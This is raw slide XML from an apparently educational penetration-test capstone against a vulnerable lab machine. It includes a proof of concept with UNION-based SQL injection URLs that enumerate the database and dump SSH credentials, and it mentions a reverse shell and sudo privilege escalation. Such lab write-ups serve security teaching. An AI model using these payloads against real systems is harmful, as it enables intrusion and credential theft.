              <a:t>              This capstone project demonstrates a real-world penetration test on a vulnerable system. It covers all key phases—from reconnaissance using tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Netdiscover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, to exploitation via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remote Command Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>              A misconfigured </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.git directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>revealed credentials, enabling access to the web application. Through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, sensitive data such as database structure and user credentials were extracted. This led to remote shell access via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reverse shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSH tunneling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>followed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privilege escalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>using a Python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>             Key challenges included bypassing login protections and achieving stable access. The project highlights how minor misconfigurations can lead to full system compromise and reinforces the need for strong defensive practices. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="161A3E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>             Emphasizes proactive defense through ethical hacking, where identifying vulnerabilities strengthens systems against malicious actors. The project aligns with the principle that understanding attacker methodologies is key to robust cybersecurity.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3875312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5C58E-C2E2-6A80-2D96-2869D169B7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A96C7-CE49-726E-8695-C8252262337C}"/>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4FEB5495-D588-2593-4E9D-5419E4634C28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS Score: 9.8 (Critical)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS Vector: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>References:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://owasp.org/www-community/attacks/SQL_Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.first.org/cvss/calculator/3-1</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Proof of Concept (PoC): </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" b="1" dirty="0"/>
              <a:t>Identify SQL Injection Point- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" dirty="0"/>
              <a:t>The id parameter in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" dirty="0" err="1"/>
              <a:t>dashboard.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" dirty="0"/>
              <a:t> is vulnerable: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.139.143/dashboard.php?id=1' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" b="1" dirty="0"/>
              <a:t>(Returns a 500 Internal Server Error, indicating improper SQL handling).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" b="1" dirty="0"/>
              <a:t>Enumerate Columns- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" dirty="0"/>
              <a:t>Use ORDER BY to determine the number of columns: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.139.143/dashboard.php?id=1' ORDER BY 6-- - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" b="1" dirty="0"/>
              <a:t>(Confirms 6 columns error occurs at ORDER BY 7).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" b="1" dirty="0"/>
              <a:t>Extract Database Schema- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" dirty="0"/>
              <a:t>Dump database names: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.139.143/dashboard.php?id=1' UNION SELECT 1,GROUP_CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>),3,4,5,6 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" b="1" dirty="0"/>
              <a:t>(Output: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" b="1" dirty="0" err="1"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" b="1" dirty="0"/>
              <a:t>, darkhole_2).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" b="1" dirty="0"/>
              <a:t>Enumerate Tables-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" dirty="0"/>
              <a:t> List tables in darkhole_2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.139.143/dashboard.php?id=1' UNION SELECT 1,GROUP_CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>),3,4,5,6 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='darkhole_2'-- - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" b="1" dirty="0"/>
              <a:t>(Output: ssh).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" b="1" dirty="0"/>
              <a:t>Extract Column Names- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" dirty="0"/>
              <a:t>List columns in the ssh table: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.139.143/dashboard.php?id=1' UNION SELECT 1,GROUP_CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>),3,4,5,6 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='ssh'-- -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" b="1" dirty="0"/>
              <a:t>(Output: user, pass).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" b="1" dirty="0"/>
              <a:t>Dump Credentials- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" dirty="0"/>
              <a:t>Extract credentials from the ssh table: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.139.143/dashboard.php?id=1' UNION SELECT 1,user,pass,4,5,6 FROM ssh-- - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" b="1" dirty="0"/>
              <a:t>(Output: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" b="1" dirty="0" err="1"/>
              <a:t>jehad:fool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1590" b="1" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24CB5422-EC4A-7C41-0A59-1B1DE5049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6968" y="298866"/>
            <a:ext cx="4375180" cy="2232312"/>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2858376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CBCC-841D-1F30-130E-37F7A18B4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78825-483D-B5D6-532C-1B6254432E88}"/>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7DD2F5FF-C1AB-D188-54F8-29B08F2F88A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258418" y="805071"/>
            <a:ext cx="7056782" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Process Analysis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Initial Access: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discovered SQL injection via error-based testing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Enumeration: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used UNION queries to extract database schema, tables, and columns.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dumped credentials </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>jehad:fool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>from the ssh table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Impact: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credentials were reused for SSH access, leading to further compromise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Steps to Reproduce:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.139.143/dashboard.php?id=1'.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Confirm SQLi via error-based testing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enumerate columns using ORDER BY.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extract database schema, tables, and columns via UNION queries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dump credentials from the ssh table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Data Breach: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sensitive database contents exposed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>System Compromise: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extracted credentials led to SSH access and privilege escalation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Reputation Damage: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unauthorized access undermines trust in the application.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3388AA5-721A-413C-108E-4C7F82E7170E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7813040" y="288706"/>
